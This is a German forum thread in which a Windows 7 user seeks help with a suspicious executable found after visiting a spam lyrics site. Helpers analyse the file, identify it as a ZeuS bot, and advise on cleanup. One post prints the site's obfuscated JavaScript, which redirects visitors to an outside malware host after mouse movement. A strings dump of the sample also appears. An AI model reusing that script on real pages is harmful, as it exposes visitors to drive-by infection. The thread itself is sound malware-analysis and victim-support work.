appdata anzeigen

K

Keisuke

0
hi

ich habe vergessen wie ich unter "benutzer" -> "hier benutzername" den ordner "appdata" anzeigen lassen kann. zurzeit ist es unsichtbar.

betriebssystem: win 7


alles klar ich habs nun wieder
in dem ordner appdata gibt es nun einen ordner namens "Roaming" und in diesem ordner ist ein anderer ordner der "Urzu" heißt und in diesem ordner befindet sich eine datei die "usnyt" heißt. eine anwendungsdatei. was macht das denn auf meinem rechner!? und was genau ist das?
als ich eine seite besuchte kam plötzlich eine meldung von meiner firewall und von spybot - search and destroy. die firewall fragte ob ich einen zugriff auf diese seite zulassen möchte. hab zur sicherheit einfach mal auf "abbrechen" statt auf "zugriff zulassen" geklickt. und spybot search and destroy fragte etwas ähnliches. dort hab ich mal auf "verweigern" geklickt.
der pc wollte plötzlich irgendwelche einstellungen oder so was vornehmen (denke ich) als ich die seite besuchte. hat die seite mir ohne dass ich es wollte eine datei geschickt?
ich wollte nach einem songtext schauen so kam ich auf die seite. das ist der link qskxpvq.angelfire.com
das ist jetzt der allgemeine link zu der seite
ich kann auch den genauen link geben.. also quasi den mit dem songtext falls nötig.
 
Zuletzt bearbeitet:
Lass mal bitte den Spybot MalWare-Scan durchlaufen.

lG
 
habe bereits direkt nach dem besuch der seite meinen rechner mit spybot und avira gescannt

avira fand nichts aber spybot fand viele verfolgende cookies, die aber inzwischen entfernt worden sind.

mit ccleaner bin ich auch mal einfach rübergegangen und mein hijackthis log hab ich auch bereits gepostet und warte nun auf eine antwort.
 
Keisuke hat gesagt.:
qskxpvq.angelfire.com
Zum Vergrößern anklicken....
also ganz ehrlich: schon diese URL klingt nach "ich werf dir böse Tierchen hinterher"...
bei wilden Zeichenfolgen als Subdomain wäre ich IMMER sehr vorsichtig...

und wenn du mal nach dieser URL googelst, findest du lauter URLs wie "qskxpvq.angelfire.com/celebrities-without-make-up-tv.html" oder "qskxpvq.angelfire.com/child-models-toplist.html", die nach Viren-Schleuder schreien...

Tipp: such dir eine seriösere Seite für Lyrics.
z.B.:


btw: gib mal bei Google site:qskxpvq.angelfire.com ein und lies einfach in den Google-Treffern dieses wunderbar computer-generierte Kauderwelsch... :D
Daran siehst du also, dass keinerlei sinnvoller Content auf dieser Seite existiert - die Seiten sind nur dazu da, um bei Google bei verschiedensten Treffern gefunden zu werden... und wer macht sowas? richtig: jemand, der dir böse Tierchen unterschieben will...
 
Ich würde die Seite nicht besuchen. Da wird eine JavaScript-Datei von einem russischen Server eingebunden:
Code: 
document.write('<img src="/xMZa.jpg" id="pbZGANeQnn">');

function OAL0eP (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}


function xaG1QkU(name) {
var cookie = " " + document.cookie;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) 
{
offset = cookie.indexOf(search);
if (offset != -1) 
{
offset += search.length;
end = cookie.indexOf(";", offset)
if (end == -1) 
{
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}

function hQxFm9(obj, evType, fn){
    if (obj.addEventListener){
        obj.addEventListener(evType, fn, false); 
        return true; 
    }
    else{
        if (obj.attachEvent){
            var r = obj.attachEvent("on"+evType, fn); 
            return r; 
        }
        else {
            return false; 
        }
	}
}

function svQUbrOEV6()
{
OAL0eP("cjvyFuRXH1","ubGNzzDhK2");
}

function NbflM7()
{
svAUMxooc4 = svAUMxooc4+1;
if (svAUMxooc4 >= 13 && svAUMxooc4 < 957673)
{
ctXMAJIvJO3();
}
}

function vdfvfv(){
	      var url="http://quick-stats.info/january/03";
		  var gif = document.createElement('A');
          gif.href = url;
	      document.body.appendChild(gif);
          var e=gif;
	      if (e.click) e.click();
              else if (e.onclick) e.onclick();
                    else if (e.href) location.href=e.href; 
    }

function ctXMAJIvJO3()
{
var RBSdm5 = xaG1QkU("cjvyFuRXH1");
if (RBSdm5 == "ubGNzzDhK2" && rumYduWGi8.width > 7 && rumYduWGi8.height > 5)
{
svAUMxooc4 = 957674;
vdfvfv();
}
}


var svAUMxooc4 = -3;
rumYduWGi8 = document.getElementById("pbZGANeQnn");
hQxFm9(rumYduWGi8, 'error', svQUbrOEV6);
hQxFm9(document.body, 'mousemove', NbflM7);
hQxFm9(window, 'mousemove', NbflM7);

Leider bin ich in JS ne Niete. Aber vielleicht kann ja jemand anders erklären, was dieser Code genau macht.
Auf jeden Fall steckt ein Teil der Malware im FavIcon der quick-stats.info-Webseite, und so wie das aussieht, würde ich spontan mal auf ein Exploitkit tippen (werde ich die Tage mir mal genauer anschauen).

Vorsorglich habe ich auch 2 Abuse-Mails rausgehauen. Da der Server aber in Russland steht, bin ich mal gespannt, ob was dabei rumkommt.
 
hab ich jetzt also einen virus auf meinem pc?
avira hat nichts gefunden
und mit spybot hab ich auch bereits alle funde gelöscht

bin ich wieder sicher oder sollte ich noch mehr tun?

und hier will jemand dass ich ihm die datei "usnyt" im ordner "Urzu" schicke
ist das denn nun überhaupt ein virus?
 
Ob die Datei nun wirklich Malware enthält oder nicht, wird dir ohne genauere Überprüfung niemand sagen können. Um zu überprüfen ob die Datei bekannte Malware enthält, kannst du sie ja mal bei www.virustotal.com hochladen. Dort wird die Datei mit allen gängigen Virenscannern überprüft.
Aber selbst wenn nichts gefunden wird, besteht immernoch die Gefahr, dass die Malware modifiziert wurde oder relativ neu und unbekannt ist, sodass die AV-Hersteller davon noch nichts mitbekommen haben.

Der Pfad an dem die Datei liegt und der Ordner- und Dateinamen würden mich auf jeden Fall sehr sehr stutzig werden lassen. Eine Windows-Datei oder eine Datei von gängigen Programmen ist es aller Wahrscheinlichkeit nach nicht.
 
unter "eigenschaften" steht "erstellt: ‎Mittwoch, ‎1. ‎September ‎2010, ‏‎22:58:28"
also hab ich das schon länger? naja ich glaub das bedeutet nicht gleich dass ich es seit dem 1. 9. hab.
die seite hab ich heute besucht
aber ich kann mich noch erinnern dass spybot mir berichtete dass auf "usnyt" zugegriffen werden möchte.
also kommt das doch höchstwahrscheinlich von dieser seite

gut ich schicke dir die datei mal
rapidshare? muss ich die datei vorher in ein rar-archiv packen? wenn ja, wie geht das?
 
unter "eigenschaften" steht "erstellt: ‎Mittwoch, ‎1. ‎September ‎2010, ‏‎22:58:28"
also hab ich das schon länger? naja ich glaub das bedeutet nicht gleich dass ich es seit dem 1. 9. hab.
die seite hab ich heute besucht
aber ich kann mich noch erinnern dass spybot mir berichtete dass auf "usnyt" zugegriffen werden möchte.
also kommt das doch höchstwahrscheinlich von dieser seite

gut ich schicke dir die datei mal
rapidshare? muss ich das vorher in ein rar-archiv packen? wenn ja wie geht das?
 
Ich habe die Datei erhalten und einen kurzen Blick darauf geworfen. Die Datei ist nicht signiert und so ziemlich alles daran sieht generisch aus. In meiner VM verweigert die Datei aber ihren Dienst, das Programm beendet sich kurz nach dem Start immer wieder.
Zuerst hat es sich scheinbar daran gestört nicht mit Adminrechten ausgeführt zu werden. (Zur LSA gepiped und als eingeschränkter User hat es sich wortlos beendet). Nun wird es in dem Administrator-Account ausgeführt, aber es beendet sich immer noch... :rolleyes:
Außer dem LSA-Zugriff machen mich noch die WinAPI-Zugriffe etwas stutzig:
Code: 
kerberos:/data/share# strings usnyt.exe | grep Create
CreateProcessA
CreateFileW
CreateEventW
HeapCreate
CreateFileA
kerberos:/data/share# strings usnyt.exe | grep Load
LoadResource
LoadLibraryA
CreateProcessA
GetEnvironmentStringsW
SetStdHandle
InitializeCriticalSection
LockResource
CloseHandle
GlobalUnlock
LeaveCriticalSection
GetSystemTime
GetModuleFileNameA
GetVersion
lstrlenW
GetLocalTime
EnterCriticalSection
GetStdHandle
GetCPInfo
SetUnhandledExceptionFilter
InitializeCriticalSectionAndSpinCount
GetVersionExA
CompareStringA
SetFilePointerEx
GetStringTypeA
Sleep
ReleaseMutex
GetACP
InterlockedExchange
FormatMessageW
GlobalLock
HeapSize
SleepEx
CompareStringW
GetSystemInfo
HeapReAlloc
ResetEvent
WaitForSingleObject
GetThreadLocale
GetProcessHeap
DeleteCriticalSection
WriteFileEx
GetProcAddress
DeleteFileA
VirtualAlloc
GetFileAttributesA
CreateFileW
WaitForMultipleObjectsEx
GetSystemTimeAsFileTime
RtlUnwind
InterlockedExchangeAdd
FreeEnvironmentStringsW
CreateEventW
lstrlenA
WaitForSingleObjectEx
GetCommandLineA
HeapAlloc
LoadResource
FreeLibrary
HeapCreate
GetLastError
LocalFree
HeapFree
SizeofResource
FindClose
SetLastError
FlushFileBuffers
VirtualFree
MultiByteToWideChar
RaiseException
SetErrorMode
GetFileSizeEx
LCMapStringW
TerminateProcess
HeapDestroy
SetEndOfFile
TlsSetValue
LocalAlloc
GetModuleHandleA
ReadFileEx
CreateFileA
LCMapStringA
GetLocaleInfoA
SetEnvironmentVariableA
GetModuleHandleW
GetExitCodeProcess
GetTickCount
GetCurrentProcess
GetStartupInfoA
GlobalFree
IsDBCSLeadByte
WideCharToMultiByte
GetCurrentThread
SetEvent
GetEnvironmentStrings
GetCurrentProcessId
LoadLibraryA
GetCurrentThreadId
ExitProcess
UnhandledExceptionFilter
GetCommandLineW
USER32.dll
GetDlgItemInt
GetDlgItemTextW
GetWindowLongW
GetMenuState
SendMessageA
GetClientRect
GetWindowLongA
DestroyWindow
GetWindowTextA
EnableWindow
GetDCEx
SetCursorPos
GetDlgItemTextA
GetDlgItem
ShowWindow
GetMenuItemID
GetWindowTextW
TranslateMessage
GetSystemMetrics
ReleaseDC
SetWindowPos
GetDC
GetWindowRect
GetWindowDC
GetCursorPos
Secur32.dll
VerifySignature
Winmm.dll
PlaySoundA

C:\WINDOWS\system32\ntdll.dll
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\USER32.dll
C:\WINDOWS\system32\GDI32.dll
C:\WINDOWS\system32\Secur32.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\RPCRT4.dll
C:\WINDOWS\system32\Winmm.dll
C:\WINDOWS\system32\IMM32.DLL
C:\WINDOWS\system32\oleaut32.dll
C:\WINDOWS\system32\msvcrt.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\pstorec.dll
C:\WINDOWS\system32\ATL.DLL
C:\WINDOWS\system32\SHLWAPI.dll
C:\WINDOWS\system32\SHELL32.dll
C:\WINDOWS\system32\WS2_32.dll
C:\WINDOWS\system32\CRYPT32.dll
C:\WINDOWS\system32\WININET.dll
C:\WINDOWS\system32\NETAPI32.dll
Ich schau mal ob ich am Wochenende Zeit finde, mir das Ding im Debugger anzuschauen. Aber ich die Hoffnung, dass sich doch noch etwas Gutes in dieser Datei schwindet dahin... :D
 
Zuletzt bearbeitet von einem Moderator:
2 Virenscanner bei Virustotal meinen etwas gefunden zu haben:
http://www.virustotal.com/file-scan/...f80-1285362006
AntiVir beschwert sich, weil die Datei mit einem verdächtigen Packer modifiziert wurde (u.a. um nicht von Virenscanner erkannt zu werden) und Sunbelt glaubt einen generischen Trojaner gefunden zu haben. Nach dem sie nicht signiert ist und generisch erzeugt wurde, aber in großem Umfang in Windows herumfuhrwerkt, und schon 2 Virenscanner anschlagen, würde ich sie zumindest mal löschen.

Wenn du dem Rechner nicht mehr vertraust, formatier die Festplatte und spiel Windows neu auf. Eine 100%-ige Garantie, dass dein Rechner virenfrei ist, wird dir hier niemand geben können. Ich kann dir auch nicht sicher sagen, ob du nun wirklich infiziert bist. Höchstens vermuten kann ich es. Aber zum Glück ist ja gerade Wochenende und eine Formatierung und Neuinstallation dauert in der Regel auch nicht länger als 1-2 Stunden. :)
 
omg schon wieder dieser stress
kann ich die datei nicht einfach löschen und gut ist?

kann ich meine dateien auf eine externe festplatte ziehen oder muss ich angst haben dass meine externe festplatte dann auch infiziert wird?
 
Ich habe mir die Datei nun mal etwas genauer angesehen, und allem Anschein nach ist es ein neuerer ZeuS-Bot.
Ich habe das über meine Firma mal einigen AV-Hersteller zukommen lassen, aktuelle Pattern sind mittlerweile draußen:

http://www.virustotal.com/file-scan...91a5704aff7bd8ae5df55504a7c6a08f80-1285753340

Allerdings bringt das Pattern nicht wirklich viel bei dieser Malware...

Hier findet man noch mehr aktuelle Informationen zu ZeuS:
http://www.viruslist.com/de/analysis?pubid=200883691
http://blog.trendmicro.de/neue-zbot...rosser-europaeischer-banken-als-angriffsziel/
http://support.kaspersky.com/de/viruses/solutions?qid=207619478

@ Keisuke:
Entschuldige bitte, dass ich mich erst jetzt melde, aber ich war beruflich meist unterwegs und hatte einfach keine Zeit mich dem Thema früher anzunehmen.
Falls du noch nicht formatiert und neuinstalliert hast, solltest du dir insbesondere mal den letzten Link anschauen (bzgl. Desinfektion). Und vergiss nicht danach alle Passwörter zu ändern. ;)
 
Zumindest mal nicht mit dieser ZeuS/Zbot-Variante. ;)
 
hm :(

also brauch ich schon mal keine angst zu haben dass irgendjemand meine passwörter bekommt oder?

nun.. avira und hijackthis finden auch nichts auffälliges.
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben